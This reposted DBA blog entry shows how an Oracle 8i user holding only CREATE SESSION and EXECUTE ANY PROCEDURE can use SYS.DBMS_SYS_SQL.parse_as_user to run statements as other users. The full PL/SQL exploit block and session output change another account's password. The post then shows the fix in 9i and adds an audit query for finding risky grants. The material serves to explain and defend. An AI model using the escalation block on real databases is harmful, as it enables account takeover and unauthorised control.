While looking into a 7445 error today I came across a post; it is recorded below:
Tom has said more than once:
All I need is "CREATE SESSION" and "EXECUTE ANY PROCEDURE" and I can totally do anything I want to in your database.
So where does the danger in EXECUTE ANY PROCEDURE come from?
Let us look at the danger through an example.
1. Create the test users
$ sqlplus "/ as sysdba"

SQL*Plus: Release 8.1.7.0.0 - Production on Tue May 10 09:57:41 2005

(c) Copyright 2000 Oracle Corporation. All rights reserved.

Connected to:
Oracle8i Enterprise Edition Release 8.1.7.4.0 - 64bit Production
With the Partitioning option
JServer Release 8.1.7.4.0 - 64bit Production

SQL> create user hacker identified by hacker default tablespace users temporary
  2  tablespace temp;

User created.

SQL> grant create session to hacker;

Grant succeeded.

SQL> grant execute any procedure to hacker;

Grant succeeded.

SQL> create user loser identified by loser default tablespace users temporary
  2  tablespace temp;

User created.

SQL> grant connect to loser;

Grant succeeded.
2. Connect as the test user
Note that at this point user hacker has the privilege to access and execute the dbms_sys_sql package.
SQL> connect hacker/hacker
Connected.
SQL> desc sys.dbms_sys_sql
PROCEDURE BIND_ARRAY
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 N_TAB                          TABLE OF NUMBER         IN
PROCEDURE BIND_ARRAY
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 C_TAB                          TABLE OF VARCHAR2(2000) IN
....
PROCEDURE VARIABLE_VALUE_ROWID
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 VALUE                          ROWID                   OUT
3. What does this mean?
SQL> connect hacker/hacker
Connected.
SQL> DECLARE
  2     UID       NUMBER;
  3     sqltext   VARCHAR2 (100) := 'alter user loser identified by test';
  4     c         INTEGER;
  5  BEGIN
  6     c := SYS.DBMS_SYS_SQL.open_cursor ();
  7     SYS.DBMS_SYS_SQL.parse_as_user (c, sqltext, DBMS_SQL.native, 0);
  8     SYS.DBMS_SYS_SQL.close_cursor (c);
  9  END;
 10  /

PL/SQL procedure successfully completed.
Through DBMS_SYS_SQL.parse_as_user, hacker can now do whatever it likes inside the database.
The password of user loser has already been changed:
SQL> connect loser/loser
ERROR:
ORA-01017: invalid username/password; logon denied

Warning: You are no longer connected to ORACLE.
SQL> connect loser/test
Connected.
SQL>
4. Mind the version
In fact this bug exists only in Oracle8i; from Oracle9i onward, even holding the execute any procedure privilege is no longer enough to access DBMS_SYS_SQL.
SQL> grant execute any procedure to test;

Grant succeeded.

Elapsed: 00:00:00.33
SQL> connect test/test
Connected.
SQL> desc dbms_sys_sql
ERROR:
ORA-04043: object dbms_sys_sql does not exist

SQL> desc sys.dbms_sys_sql
ERROR:
ORA-04043: object sys.dbms_sys_sql does not exist

SQL> select * from v$version;

BANNER
----------------------------------------------------------------
Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
PL/SQL Release 9.2.0.4.0 - Production
CORE    9.2.0.3.0       Production
TNS for Linux: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production

Elapsed: 00:00:00.32
The Oracle world is becoming more secure as well.
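The practical follow-up for a DBA is to find out who holds EXECUTE ANY PROCEDURE, including users who only get it through a chain of roles, and whether anyone has been granted the package directly (a direct object grant on SYS.DBMS_SYS_SQL is not covered by the 9i change shown above). The audit query below is an added example, not part of the original post; it assumes the session can read the DBA_* views and V$VERSION, and it uses CONNECT BY rather than a recursive WITH so that it also works on the 8i/9i releases discussed here.

```sql
-- Constructed audit script (added example, not from the original post).
-- 1. Every user who ends up holding EXECUTE ANY PROCEDURE, whether the
--    grant is direct or arrives through one or more roles.  DBA_SYS_PRIVS
--    lists privileges granted to users *and* to roles, so we start from the
--    roles that hold the privilege and walk DBA_ROLE_PRIVS upward to the
--    users that were granted those roles.
SELECT u.username,
       CASE
         WHEN u.username IN (SELECT grantee
                               FROM dba_sys_privs
                              WHERE privilege = 'EXECUTE ANY PROCEDURE')
         THEN 'DIRECT'
         ELSE 'VIA ROLE'
       END AS how_granted
  FROM dba_users u
 WHERE u.username IN (
         -- granted straight to the user
         SELECT grantee
           FROM dba_sys_privs
          WHERE privilege = 'EXECUTE ANY PROCEDURE'
         UNION
         -- granted to a role, possibly nested inside other roles
         SELECT grantee
           FROM dba_role_privs
          START WITH granted_role IN (SELECT grantee
                                        FROM dba_sys_privs
                                       WHERE privilege = 'EXECUTE ANY PROCEDURE')
        CONNECT BY PRIOR grantee = granted_role
       )
 ORDER BY u.username;

-- 2. Direct object grants on the package itself; these bypass the
--    version-dependent behaviour from step 4, so review them on any release.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_SYS_SQL'
 ORDER BY grantee;

-- 3. Which release this is, since the post shows 8i and 9i behave differently.
SELECT banner
  FROM v$version
 WHERE banner LIKE 'Oracle%';
```

On the 8i instance from step 1 the first query returns HACKER with how_granted = DIRECT; any non-administrative account in that list should be treated as if it held DBA, because, as the post demonstrates, parse_as_user lets it run arbitrary statements as any user. The CASE only distinguishes direct grants from role-derived ones; to see the actual role path for a VIA ROLE row, run the hierarchical subquery on its own with LEVEL and SYS_CONNECT_BY_PATH.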
The central point is that with those two privileges you gain the ability to access and execute the dbms_sys_sql package. Fortunately this hole is gone from 9i onward. There is always more to learn!
From "ITPUB Blog", link: http://blog.itpub.net/7177735/viewspace-705118/. If reposting, please cite the source; otherwise legal action will be pursued.